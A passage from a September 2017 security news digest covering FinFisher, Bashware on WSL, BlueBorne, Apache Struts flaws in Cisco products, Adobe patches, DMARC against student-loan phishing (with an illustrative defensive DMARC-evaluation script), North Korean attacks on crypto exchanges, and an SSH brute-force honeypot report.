“[This variant of FinFisher] leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult,” FireEye researchers said in a blog post. “As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames.”

Microsoft has linked the attack to a group it tracks as NEODYMIUM, which last year used a Flash Player zero-day vulnerability to deliver FinFisher.

While Microsoft’s advisory for CVE-2017-8759 contains little information, FireEye’s blog post includes many technical details.

Earlier this year, Kaspersky noticed the FinFisher malware being delivered via a Microsoft Office zero-day (CVE-2017-0199) by a Middle Eastern threat actor named “BlackOasis.” FireEye also spotted attacks exploiting CVE-2017-0199 to deliver FinFisher earlier this year, and the security firm believes CVE-2017-8759 may have also been used by other groups, although currently there is no evidence to support this theory.


Linux Malware Could Run Undetected on Windows: Researchers

13.9.2017 securityweek Virus
A new Windows 10 feature that makes the popular Linux bash terminal available for Microsoft’s operating system could allow for more malware families to target the operating system, Check Point researchers claim.

Called Windows Subsystem for Linux (WSL), the feature exited beta a couple of months ago and is set to become available to all users in the upcoming Windows 10 Fall Creators Update (FCU), set to be released by Microsoft in October 2017.

The feature brings the Linux command-line shell to Windows, thus allowing users to natively run Linux applications on Windows systems. Because of that, Check Point researchers argue, malware designed for Linux can slip undetected onto Windows computers.

Called Bashware, the new attack technique could be abused even by known Linux malware, because anti-malware solutions for Windows haven’t been configured to detect such threats, the security researchers argue.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time. This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms,” Check Point says.

The security researchers claim they have already tested the attack technique on “most of the leading anti-virus and security products on the market,” and managed to successfully bypass all of them. Because of that, they claim, “Bashware may potentially affect any of the 400 million computers currently running Windows 10 PC globally.”

The risks posed by WSL, however, are mitigated by the fact that the user needs to manually enable the feature and reboot the system. Malware that wants to abuse the feature would need to enable developer mode on Windows, which is disabled by default, and even download and extract the Linux file system from Microsoft’s servers.

Check Point says the necessary features could be silently enabled in the background, thus setting up the required environment without the user's knowledge. Moreover, the researchers say they were able to run Windows-based malware in the newly set up environment.

The researchers also point out that the newly discovered attack technique doesn’t leverage an implementation flaw, but that the lack of awareness by various security vendors is the actual issue here.

“However, we believe that it is both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware,” Check Point says.

According to Microsoft, however, the risks posed by such an attack are low, given that the features required to run Linux apps on Windows are disabled by default.

“We reviewed and assessed this to be of low risk. One would have to enable developer mode, then install the component, reboot, and install Windows Subsystem for Linux in order for this to be effective. Developer mode is not enabled by default,” a Microsoft spokesperson told SecurityWeek via email.

Contacted by SecurityWeek, anti-malware vendor Kaspersky Lab confirmed in an emailed statement that they are aware of the potential risks posed by WSL and that they are already working on the technology necessary to detect any malware that could abuse it.

“Kaspersky Lab is aware of the possibility to create malware for Windows Subsystem for Linux (WSL) and is working on technologies to detect this type of malware on user devices. In fact, in 2018, all Kaspersky Lab solutions for Windows will be updated with special technologies that detect behaviorally and heuristically and block any Linux and Windows threats when WSL mode is on. Currently, all Kaspersky Lab frontline solutions for Windows can detect downloaders and Windows parts of Linux malware,” Kaspersky Lab said.


New VMware release enables management of all endpoint platforms

13.9.2017 SecurityWorld Security
VMware has introduced Workspace One, which according to the vendor is the first unified user environment solution with management and security support for all endpoint platforms.

VMware showed Workspace One with the integrated AirWatch solution, which enables the delivery, management and security of a unified user environment across all endpoint platforms.

The solution comes with user identity verification and offers consumer-grade convenience and simplicity together with enterprise-class security. Using Horizon application and desktop virtualization technology, it extends the same environment and security to traditional Windows systems.

According to the vendor, companies will thus be able to use Workspace One as a single solution for unified endpoint management (UEM) and unify the user environment across all endpoint platforms, including Windows, macOS, Chrome OS, iOS and Android.

In addition, Workspace One now also includes application programming interfaces (APIs) from major endpoint platform providers.

Workspace One gives end users a fully self-service experience, from onboarding new devices to productive use. An employee can receive a new laptop and start using it within minutes, thanks to a connection to corporate systems right after first boot and self-service applications.

This new approach eliminates the complex, costly and error-prone desktop management model and increases security through the ability to isolate and update any device in real time via the cloud. Workspace ONE offers the same principle and security model for Windows 10 and macOS as well.

Workspace ONE will also offer cloud-based peer-to-peer (P2P) software distribution for installing large applications on many PCs located at different sites. This removes the need for costly branch servers that require separate infrastructure management.

The Horizon 7 virtual desktop infrastructure, integrated with the VMware Cloud Foundation platform and the Dell EMC VDI Complete solution, together with Horizon Apps, also combines the management of compute, storage and network resources and infrastructure. This removes the need for detailed planning and a detailed overview of the operation of individual infrastructure components.

Together with the Horizon Cloud service, companies thus have infrastructure for both on-premises and cloud deployment. Management of Windows desktops and applications can also be automated using the VMware Just in Time Management Platform (JMP) and a technology preview that integrates the JMP platform technologies (Instant Clone, VMware App Volumes and User Environment Manager) into a single management console, which makes administration much easier.

Also new is Workspace One Intelligence, an add-on service that provides comprehensive visibility and enables automated actions. Its purpose is to speed up planning, increase security and improve the user experience. Integrated functions for defining and enforcing rules allow customers to automate actions that provide protection and performance optimization in real time, something legacy systems do not allow.


Analytics with biometrics: the key to future data protection

13.9.2017 SecurityWorld Security
According to an Accenture report, biometrics and advanced analytics will revolutionize how data security and personal data protection are handled.

The report, Emerging Technologies in Public Service, examines the adoption of emerging technologies in government agencies that interact directly with citizens or that bear the greatest responsibility for citizen services. These include, for example, health and social services, police and justice, tax authorities, border services, and pension and social security agencies.

These technologies include advanced analytics, predictive modelling, the Internet of Things, intelligent automation, video analytics, biometric and identity analytics, machine learning and natural language processing.

Accenture surveyed people in Europe, North America and the Asia-Pacific region. The adoption of new technologies is viewed very positively in particular by tax authorities (84%) and social security administrations (76%). They put the emphasis mainly on reducing risk and improving fraud prevention through the adoption of analytics and biometric technologies. Border agency representatives (68%) also expect major benefits from adopting new technologies.

The survey results also show that 71% of respondents are currently deploying advanced analytics and predictive modelling solutions. The sectors reporting the highest levels of data analytics adoption are tax and social services (81% and 80%), followed by border services (74%) and public safety agencies (62%).

More than two thirds (69%) of all respondents said they are adopting or considering adopting biometric technologies. Interestingly, although almost two thirds (62%) of respondents said they are familiar with video analytics, less than one third (28%) said their agencies are adopting such solutions.

The sector with the highest rate of biometric technology adoption is public safety (51%), followed by respondents from pension and social security agencies (48%) and border agencies (36%). The study shows that biometric solutions are in high demand and widely used; e-passports and iris recognition are the most commonly adopted. This is also evidenced by the fact that almost two thirds (65%) of survey respondents said they are piloting, deploying or researching biometric and identity analytics.

"Biometrics-based security solutions working in combination with analytics technologies offer government agencies effective and previously unavailable real-time identification and verification capabilities and strengthen both security and the understanding of data," said Ger Daly, who leads Accenture's defence and public safety practice. "This makes it possible to deliver a new level of service and shapes government services that are centred on the citizen, not the institution."

Observations from individual countries

Data security and personal data protection were rated as the biggest challenges in all nine countries surveyed. Respondents from the UK and Germany were the least likely to have concerns about personal data protection and security (14% and 15%).
Respondents in Australia and Singapore are the most likely to be adopting biometric technologies (68% in both countries), while the country with the lowest adoption rate is Finland (22%).
Respondents from the US were the most likely to say that adopting biometrics could reduce risk and improve data security and privacy (51%), compared with respondents from Japan, who were the least likely to hold this view (12%).
Respondents from Australia (48%) and France (45%) were the most likely to say that adopting data analytics could reduce risk and improve data security. In the US, only 2% held this view, the lowest share.
Respondents in Japan use video analytics more than in any other country (43%), while respondents from Germany were the least likely to adopt this technology (18%).
Agencies in Australia and Singapore are adopting biometrics and identity analytics technologies the most, at 68%, followed by Japan (57%), France (42%) and the UK (34%).


BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking
12.9.2017 thehackernews Attack
If you are using a Bluetooth-enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can be carried out remotely to take over your device without requiring any interaction on your side.
Security researchers have just discovered a total of eight zero-day vulnerabilities in the Bluetooth protocol that impact more than 5.3 billion devices—from Android, iOS, Windows and Linux to Internet of Things (IoT) devices—using the short-range wireless communication technology.
Using these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed BlueBorne, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks without requiring any victim interaction.
All an attacker needs is for the victim's device to have Bluetooth turned on and, obviously, to be in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device.
BlueBorne: Wormable Bluetooth Attack

What's more worrisome is that the BlueBorne attack could spread like the wormable WannaCry ransomware that emerged earlier this year and wreaked havoc by disrupting large companies and organisations worldwide.
Ben Seri, head of the research team at Armis Labs, claims that during an experiment in the lab, his team was able to create a botnet and install ransomware using the BlueBorne attack.

However, Seri believes that it is difficult for even a skilled attacker to create a universal wormable exploit that could find Bluetooth-enabled devices, target all platforms together and spread automatically from one infected device to others.
"Unfortunately, this set of capabilities is extremely desirable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet," Armis said.
"The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure "air-gapped" networks which are disconnected from any other network, including the internet."
Apply Security Patches to Prevent Bluetooth Hacking
The security firm responsibly disclosed the vulnerabilities to all the major affected companies a few months ago, including Google, Apple, Microsoft, Samsung and the Linux Foundation.
These vulnerabilities include:
Information Leak Vulnerability in Android (CVE-2017-0785)
Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service
Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile
The Bluetooth Pineapple in Android—Logical flaw (CVE-2017-0783)
Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)
Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)
The Bluetooth Pineapple in Windows—Logical flaw (CVE-2017-8628)
Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)
Google and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe.
“Microsoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.” – a Microsoft spokesperson said.
What's worse? All iOS devices running 9.3.5 or older and over 1.1 billion active Android devices running versions older than Marshmallow (6.x) are vulnerable to the BlueBorne attack.
Moreover, millions of smart Bluetooth devices running a version of Linux are also vulnerable to the attack. Commercial and consumer-oriented Linux platforms (Tizen OS), BlueZ and 3.3-rc1 are also vulnerable to at least one of the BlueBorne bugs.
Android users need to wait for security patches for their devices, as availability depends on their device manufacturer.
In the meantime, they can install the "BlueBorne Vulnerability Scanner" app (created by the Armis team) from the Google Play Store to check whether their devices are vulnerable to the BlueBorne attack. If a device is found vulnerable, users are advised to turn off Bluetooth when it is not in use.


Samsung Launches Bug Bounty Program — Offering up to $200,000 in Rewards
12.9.2017 thehackernews Security

With the growing number of cyber attacks and data breaches, a number of tech companies and organisations have started Bug Bounty programs for encouraging hackers, bug hunters and researchers to find and responsibly report bugs in their services and get rewarded.
Samsung is the latest in the list of tech companies to launch a bug bounty program, announcing that the South Korean electronics giant will offer rewards of up to $200,000 to anyone who discovers vulnerabilities in its mobile devices and associated software.
Dubbed Mobile Security Rewards Program, the newly-launched bug bounty program will cover 38 Samsung mobile devices released from 2016 onwards which currently receive monthly or quarterly security updates from the company.
So, if you want to take part in the Samsung Mobile Security Rewards Program, these are the devices in scope: the Galaxy S, Galaxy Note, Galaxy A, Galaxy J, and the Galaxy Tab series, as well as Samsung's flagship devices, the S8, S8+, and Note 8.
"We take security and privacy issues very seriously; and as an appreciation for helping Samsung Mobile improve the security of our products and minimizing risk to our end-consumers, we are offering a rewards program for eligible security vulnerability reports," the company explains on its bug bounty website.
"We look forward to your continued interests and participations in our Samsung Mobile Security Rewards Program. Through this rewards program, we hope to build and maintain valuable relationships with researchers who coordinate disclosure of security issues with Samsung Mobile."
Not just mobile devices, the tech giant's Mobile Services suite is also part of its bug bounty program, which will also cover apps and services such as Bixby, Samsung Account, Samsung Pay, Samsung Pass, among others.
For the eligibility of a reward, researchers and bug hunters need to provide a valid proof-of-concept (PoC) exploit that can compromise a Samsung handset without requiring any physical connection or third-party application.
The company will evaluate the reward depending on the severity level of the vulnerability (Critical, High, Moderate, and Low) and its impact on devices. The lowest reward is $200, for low-severity flaws, while the highest reward is $200,000, for critical bugs.
Higher rewards will be offered for bugs that lead to a trusted execution environment (TEE) or bootloader compromise. The level of severity will be determined by Samsung.
Samsung's top bounty of $200,000 is equal to the reward offered under Apple's bug bounty program but is slightly lower than Microsoft's newly launched bounty program, which offers $250,000 for Windows 10 security bugs.
Following the path of major tech companies, the non-profit group behind the Tor Project recently joined hands with HackerOne to launch its own bug bounty program, with the highest payout set at $4,000.
So, what are you waiting for? Hunt for bugs in Samsung products and submit your findings to the company via its Security Reporting page.


Apache Struts 2 Flaws Affect Multiple Cisco Products
12.9.2017 thehackernews Vulnerability
After the massive Equifax data breach, believed to have been caused by a vulnerability in Apache Struts, Cisco has initiated an investigation into its products that incorporate a version of the popular Apache Struts 2 web application framework.
Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language, and is used by 65 percent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS.
However, the popular open-source software package was recently found to be affected by multiple vulnerabilities, including two remote code execution vulnerabilities—one discovered earlier this month, and another in March—one of which is believed to have been used to breach the personal data of over 143 million Equifax users.
Some Cisco products, including its Digital Media Manager, MXE 3500 Series Media Experience Engines, Network Performance Analysis, Hosted Collaboration Solution for Contact Center, and Unified Contact Center Enterprise, have been found vulnerable to multiple Apache Struts flaws.
Cisco Launches Apache Struts Vulnerability Hunting
Cisco is also testing the rest of its products against four newly discovered security vulnerabilities in Apache Struts 2, including the one (CVE-2017-9805) we reported on September 5 and the remaining three also disclosed last week.
However, the remote code execution bug (CVE-2017-5638) that was actively exploited back in March this year is not included by the company in its recent security audit.
The three vulnerabilities included in the Cisco security audit—CVE-2017-9793, CVE-2017-9804 and CVE-2017-9805—were disclosed by the Apache Software Foundation on 5 September with the release of Apache Struts 2.5.13, which patched the issues.
The fourth vulnerability (CVE-2017-12611) being investigated by Cisco was disclosed on 7 September with the release of Apache Struts 2.3.34, which fixed a flaw in the Freemarker tag functionality of the Apache Struts 2 package that could allow an unauthenticated, remote attacker to execute malicious code on an affected system.
Apache Struts Flaw Actively Exploited to Hack Servers & Deliver Malware
The most severe of all, CVE-2017-9805 (rated critical), is a programming bug that manifests in the way the Struts REST plugin handles XML payloads while deserializing them.
This could allow a remote, unauthenticated attacker to achieve remote code execution on a host running a vulnerable version of Apache Struts 2, and Cisco's threat intelligence arm Talos has observed that this flaw is under active exploitation by attackers scanning for vulnerable servers.
Security researchers from data centre security vendor Imperva recently detected and blocked thousands of attacks attempting to exploit this Apache Struts 2 vulnerability (CVE-2017-9805), roughly 80 percent of which tried to deliver a malicious payload.
The majority of attacks originated from China with a single Chinese IP address registered to a Chinese e-commerce company sending out more than 40% of all the requests. Attacks also came from Australia, the U.S., Brazil, Canada, Russia and various parts of Europe.
Out of the two remaining flaws, one (CVE-2017-9793) is again a vulnerability in the REST plug-in for Apache Struts that manifests due to "insufficient validation of user-supplied input by the XStream library in the REST plug-in for the affected application."
This flaw has been given a Medium severity and could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on targeted systems.
The last flaw (CVE-2017-9804) also allows an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system but resides in the URLValidator feature of Apache Struts.
Cisco is testing its products against these vulnerabilities including its WebEx Meetings Server, the Data Center Network Manager, Identity Services Engine (ISE), MXE 3500 Series Media Experience Engines, several Cisco Prime products, some products for voice and unified communications, as well as video and streaming services.
Currently, there are no software patches to address the vulnerabilities in Cisco products, but the company has promised to release updates for affected software, which will soon be accessible through the Cisco Bug Search Tool.
Since the framework is widely used by a majority of Fortune 100 companies, they should also check any part of their infrastructure that incorporates a version of Apache Struts 2 against these vulnerabilities.


Adobe Patches Two Critical Flaws in Flash Player

12.9.2017 securityweek  Vulnerebility
Adobe has patched only two vulnerabilities in Flash Player this month, but they can both be exploited for remote code execution and both have been classified as critical.

The flaws, tracked as CVE-2017-11281 and CVE-2017-11282, were discovered by Mateusz Jurczyk and Natalie Silvanovich of Google Project Zero in Flash Player 26.0.0.151 and earlier. The security holes are caused by memory corruption issues.

Adobe said there was no evidence that either of the two flaws had been exploited in attacks before the patches were released. Adobe and several tech giants have decided to kill Flash Player by the end of 2020.

The company has also released patches for a couple of vulnerabilities affecting the Windows version of its help authoring tool RoboHelp. RoboHelp 2017.0.1 and earlier and 12.0.4.460 and earlier are affected by an important input validation flaw that can be exploited for cross-site scripting (XSS) attacks, and a moderate-severity unvalidated URL redirect issue that can be leveraged for phishing attacks.

Reynold Regan of the CNSI - Center for Technology & Innovation in Chennai has been credited for reporting the weaknesses to Adobe.

Security updates have also been released for ColdFusion 11 and 2016 to address a critical XML parsing vulnerability and an XSS flaw that can lead to information disclosure. The updates also include mitigations designed to prevent remote code execution via unsafe Java deserialization.

Nick Bloor of NCC Group, Daniel Sayk of Telekom Security, and Daniel Lawson of Depth Security have reported these flaws to Adobe.


DMARC in Higher Education: A Formidable Defense Against Targeted Scams

12.9.2017 securityweek Phishing
DMARC Can Be Effective in Defending Against Targeted Phishing Attacks And Student Loan Scams

As the new academic year starts, so starts the "Fresher" phishing scam. Second year students are also targeted, but the new first year university intake is the most vulnerable. It has already begun in the UK where the year starts earlier than in the U.S. -- but will follow wherever there are new students who rely on loans.

ActionFraud, which recently issued a warning, is operated by the City of London Police, the lead agency for action against fraud in the UK. The phishing campaign has leveraged the Student Loan Company (SLC), which governs loans to students. The phishing email claims that there is a problem with the loan, and that new students should log into their account (on a phishing site) to update their information.

"Because tens of thousands of students will be starting university this month," warns John Wilson, field CTO at Agari, "cyber criminals can send out broad, untargeted phishing campaigns to huge databases and be confident they will reach a large number of victims."

Phishing Scams Target Universities

But there is a solution to this type of phishing, where the scammer pretends to be a specific organization -- such as the SLC or a particular university. Those organizations should implement Domain-based Message Authentication, Reporting and Conformance (DMARC).

DMARC effectively whitelists the genuine emails from genuine domains, so that ISPs and receiving organizations (such as universities) can reject or block spoofed mails. "DMARC is an open source email authentication standard that will reject unauthorized messages using the domain, preventing them from ever being delivered," explains Wilson.

The UK government is a big supporter, and DMARC is used, for example, by the UK tax office (HMRC). Last year, Ian Levy, technical director of the National Cyber Security Centre (NCSC, part of GCHQ) said that all 5,700 domains used by the UK government will be adopting DMARC. Once this is achieved, he intends to apply pressure on industry in general to force them to do the same. "I'm going to point and laugh at everybody who doesn't do the same -- publicly," said Levy. "Because there is no excuse not to do DMARC on a high value domain anymore."

The NCSC did not respond to SecurityWeek's inquiry over whether it now recommends that SLC and UK universities should implement DMARC. SecurityWeek also asked SLC whether it uses DMARC to protect the students, and was told, "Due to the sensitivity of the topic we wouldn't comment on the range of tools and methods that we use to counter fraud."

However, when SecurityWeek spoke to the security industry, there was less reluctance to comment. Is the same issue a problem in America? Yes, says Dan Lohrmann, chief security officer at Security Mentor -- although he hasn't seen any elevated concern yet this year (he's more concerned with Hurricanes Harvey- and Irma-related phishing scams right now).

"The back-to-school timeframe is perfect for malicious actors, as students are headed back to the classroom with their latest devices and are expecting a number of emails to be hitting their inboxes from faculty and staff," comments Jordan Wright, senior R&D engineer at Duo Security. "This scenario is just as prevalent in the US as it is anywhere else, with bogus emails purporting to have a student's grades ready for viewing, the latest assignment(s) for completion, student loan changes or simply a call to update personal information for the university's system."

"We see this type of phishing attack every year," adds Lohrmann, "especially in the Fall in 'back-to-school' season. Going after new University students with financial scams has been happening for years, and specific loan-related phishing is an ongoing challenge."

DMARC Implementation

Asaf Cidon, VP of content security at Barracuda, agrees. "Phishing is a growing problem for educational institutions. We've seen a particularly sharp increase in Office 365 account compromise attacks -- where criminals attempt to steal login credentials and ultimately gain access to launch attacks from within an organization. One customer we spoke with recently had some 200 accounts hijacked -- including the Dean and multiple faculty, students, and staff."

Should universities and related organizations (such as SLC in the UK) implement DMARC?

"Universities should absolutely implement DMARC," Cidon adds. "Universities send a wide variety of messages, often from multiple departments, alumni, and third-parties. DMARC is a great tool to prevent domain spoofing, and also to ensure deliverability of legitimate mail (which is important for EDUs looking at planned giving, recruitment, and other activities)."

DMARC is, however, complex to implement. Martin Zinaich, information security officer for the City of Tampa, told SecurityWeek, "it goes a long way to reducing spoofed messages (which is usually how an account gets compromised in the first place). But," he added, "even dmarc.org recognizes that fully deploying this framework is not easy: 'Many senders have a complex email environment with many systems sending email, often including 3rd party service providers. Ensuring that every message can be authenticated using SPF or DKIM is a complex task, particularly given that these environments are in a perpetual state of flux.'"

Alan Levine, a security advisor to phishing specialist Wombat, adds, "DMARC does help in terms of domain authentication, but it is not close to a panacea. Any attacker with a particular target will register a 'like' domain, something close to and almost indiscernible from the targeted organization's domain. Then, DMARC won't help, because the domain will appear legit, even though the mission is malicious."

So, while the first step would be to implement DMARC, an important second step would be to seek control over potential look-alike domains that could be used as phishing sites. While this is in progress, users such as students will remain vulnerable. At this point, security awareness training is an important option.
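To make the mechanism concrete, here is an added example (not code from the article or from any of the vendors quoted in it) that evaluates the DMARC outcome for one received message the way a receiving mail server does: a message passes only if SPF or DKIM succeeded for a domain that aligns with the visible From: domain; otherwise the policy published by the domain owner (p=none, quarantine or reject) decides. The domains, the DMARC records and the authentication results are all constructed; `slc.example` stands in for a loan body and `university.example` for a campus. It also shows the limitation Levine describes: a look-alike domain that publishes no record of its own simply gets no DMARC treatment.

```python
"""DMARC disposition for one received message (RFC 7489 semantics, simplified).

Added illustration, not code from the article or from any vendor quoted in it.
A message passes DMARC only if SPF or DKIM passes AND the domain that passed
aligns with the RFC5322.From domain; otherwise the published policy applies.
"""
from dataclasses import dataclass

# Constructed DMARC TXT records (as published at _dmarc.<domain>), keyed by domain.
# Hypothetical domains: 'slc.example' stands in for a loan body, 'university.example' for a campus.
DMARC_RECORDS = {
    "slc.example": "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@slc.example",
    "university.example": "v=DMARC1; p=quarantine; rua=mailto:dmarc@university.example",
}


def parse_dmarc(record):
    """Split 'tag=value; tag=value' into a dict (unknown tags are kept, as RFC 7489 requires)."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip()] = value.strip()
    return tags


def org_domain(domain):
    """Organizational domain, approximated as the last two labels.
    Real receivers consult the Public Suffix List; the shortcut is an assumption for brevity."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(auth_domain, from_domain, mode):
    """Identifier alignment: 's' (strict) needs an exact match, 'r' (relaxed) the same org domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


@dataclass
class AuthResults:
    from_domain: str            # domain in the visible From: header
    spf_domain: str = ""        # envelope sender (MAIL FROM) domain SPF was checked against
    spf_pass: bool = False
    dkim_domain: str = ""       # d= tag of a DKIM signature that verified
    dkim_pass: bool = False


def evaluate_dmarc(res, records=DMARC_RECORDS):
    """Return 'pass', or the sender's requested disposition ('none', 'quarantine', 'reject')
    for a failing message, or 'none' when the From: domain publishes no DMARC record."""
    record = records.get(org_domain(res.from_domain))
    if record is None:
        return "none"   # no policy published: a registered look-alike domain lands here
    tags = parse_dmarc(record)
    spf_ok = res.spf_pass and aligned(res.spf_domain, res.from_domain, tags.get("aspf", "r"))
    dkim_ok = res.dkim_pass and aligned(res.dkim_domain, res.from_domain, tags.get("adkim", "r"))
    if spf_ok or dkim_ok:
        return "pass"
    return tags.get("p", "none")


if __name__ == "__main__":
    # SPF passed, but for the bulk mailer's own bounce domain, which does not align: rejected
    spoof = AuthResults("slc.example", spf_domain="bulk-mailer.example", spf_pass=True)
    print("exact-domain spoof:", evaluate_dmarc(spoof))          # reject
    # A look-alike domain with its own valid SPF is outside slc.example's policy entirely
    lookalike = AuthResults("slc-loans.example", spf_domain="slc-loans.example", spf_pass=True)
    print("look-alike domain:", evaluate_dmarc(lookalike))       # none
```

The `adkim=s` tag on the first record is why a message signed by `mail.slc.example` fails while a relaxed SPF pass from the same subdomain succeeds; this is the kind of detail that makes the dmarc.org warning about complex sending environments real, and why deployments usually start at `p=none` with reporting enabled before moving to `quarantine` and `reject`.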

"Universities should create internal awareness and education programs within their institution," says Wright. "Teaching users how to spot, report and prevent phishing attacks and emails can be a great way to reduce the risk of falling prey to such attacks. Universities can assist this by setting up dedicated web pages that flag ongoing phishing attacks for students and, whenever a phishing attack is detected as targeting their university, the IT Team can send out alerts for students."

But there is an important addendum to this. While this phishing scam is targeted against students, student loan organizations and universities, nobody and no organization is ignored by the scammers.

"Young and old alike," explains Tim Ayling, a fraud and risk intelligence director at RSA Security, "the public needs to have greater awareness of spoofing attacks and take better care to protect themselves online. Much of this comes down to basic security hygiene. Our advice would be: first and foremost, avoid clicking on links to websites from emails and any unknown sources. If in any doubt, search for the website using an engine -- particularly in cases like this where the email would've come from a random email alias, with a generic introduction that suggests it was sent to others. Secondly, the devil is in the detail. Always be sure to check the URL of a site that you are visiting to make sure that it is correct -- often spoofed sites have typos in their address that will give clues that it is not official. Lastly, check the address bar to ensure you are visiting a secure site and there are no warnings."

It's not just Freshers who get phished.


North Korean Hackers Targeting Crypto-Currency Exchanges: FireEye

12.9.2017 securityweek BigBrothers
Over the past several months, threat actors believed to have ties with North Korea have been targeting crypto-currency exchanges to obtain hard currencies for the Pyongyang regime, FireEye says.

The attacks, which FireEye has observed since May 2017, are said to be part of a campaign that started in 2016, when banks and the global financial system were hit. Given the impressive spike in value Bitcoin has seen since the beginning of the year, it’s no surprise that threat actors are interested in the potential crypto-currencies have.

Traditionally, North Korean actors have been engaging in activities typically associated with nation-state cyber espionage, but they started shifting focus to conduct cybercrime as of last year. Given the country’s position as a pariah nation that has been cut off from much of the global economy, as well as its tight control of its military and intelligence capabilities, this doesn’t come as a surprise.

As such, the recently observed interest in crypto-currencies isn’t surprising either, and FireEye considers the recent attacks to be part of a larger campaign that started last year. Since May 2017, the security researchers have observed North Korean actors targeting at least three South Korean crypto-currency exchanges, supposedly in an attempt to steal funds.

The attacks, FireEye says, involved spear-phishing attacks that often targeted the personal email accounts of employees at digital currency exchanges. Tax-themed lures were frequently employed to trick users into installing malware such as PEACHPIT and similar variants, which have been previously linked to North Korean actors.

The spear-phishing attacks started in early May and targeted one crypto-currency exchange at a time. By early June, three South Korean exchanges were hit, along with various other, unknown victims, which the security researchers suggest might be crypto-currency service providers in South Korea.

“Add to that the ties between North Korean operators and a watering hole compromise of a Bitcoin news site in 2016, as well as at least one instance of usage of a surreptitious crypto-currency miner, and we begin to see a picture of North Korean interest in crypto-currencies, an asset class in which Bitcoin alone has increased over 400% since the beginning of this year,” FireEye notes.

Prior to these attacks, South Korean crypto-currency exchange Yapizon was compromised in April, but FireEye says that “at least some of the tactics, techniques, and procedures” reportedly employed during this incident were different, and there are no clear indications of North Korean involvement.

At the end of April, however, the United States announced a strategy of increased economic sanctions against North Korea, and the subsequent attacks on South Korean exchanges might be the result of this announcement. A July attack on Bithumb might also be the result of North Korea’s increased interest in Bitcoin, a report published last month revealed.

The targeting of Bitcoin and crypto-currency exchanges fits with the previously observed North Korean actors’ interest in conducting financial crime on the regime’s behalf. By compromising a crypto-currency exchange, the actors can move crypto-currencies out of online wallets, swap them for more anonymous ones, and even “send them directly to other wallets on different exchanges to withdraw them in fiat currencies such as South Korean won, US dollars, or Chinese renminbi,” FireEye notes.

“As the regulatory environment around cryptocurrencies is still emerging, some exchanges in different jurisdictions may have lax anti-money laundering controls easing this process and make the exchanges an attractive tactic for anyone seeking hard currency,” the researchers continue.

Nation states are starting to take notice of the potential presented by Bitcoin and other crypto-currencies, given their recent increase in value. Thus, this emerging asset class is becoming a “target of interest by a regime that operates in many ways like a criminal enterprise,” FireEye notes, adding that other rising cyber powers might follow a similar path.

“Cyber criminals may no longer be the only nefarious actors in this space,” the researchers conclude.

Just last night, the UN Security Council voted unanimously to adopt new sanctions on North Korea, including restrictions on oil shipments, banning import and export of textiles, and barring countries from issuing new work permits to North Koreans working abroad.


Brute Force 900k + Attempts on a New Server
12.9.2017 securityaffairs Attack

Brute Force Attack Report – This article is going to cover an attack we have had on a new network from the second it was connected to the internet.
Instantly we were collecting data showing the determination of people trying to gain “root” access to our Server.

Our data show that on 21/August/2017 we had 150,000 failed logon attempts.

We will start by describing the attack type and potential risk involved.

Attack TYPE
Brute force attack, SSH service authentication attack

Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.

Attempts graph at the time of this report.

Brute force attack 1

Chart: Failed Logins (last 150 events)

Attack Origins
As shown in the chart below, 27.1% of the attacks, including the first IP to attempt SSH access, came from China, closely followed by Russia via a botnet attack.

Brute force attack 2

Duration of The Attack
This attack started on 19/08/2017 and is still ongoing at over 20k attempts per day (Please note this attack is being monitored 24/7 by Frontline Cyber Security Ltd and is against one of our test servers using honey pots).

We are sharing the information we are gathering with Action Fraud to help people detect and defend against future attacks from the attacking IP addresses.

Further details on this attack can be found on our Open Threat Exchange profile via the link below.

https://otx.alienvault.com/pulse/5999a448c8f3d01e51964283/

Risk to Business Explained
If this attack were to target your company's servers, the risks would be very high, depending on your password strength and server security (see below: at a speed of 1,000,000,000 passwords/sec, cracking an 8-character password composed from 96 characters takes 83.5 days, but recent research presented at Password^12 in Norway shows that 8-character passwords are no safer, as they can be cracked in 6 hours).

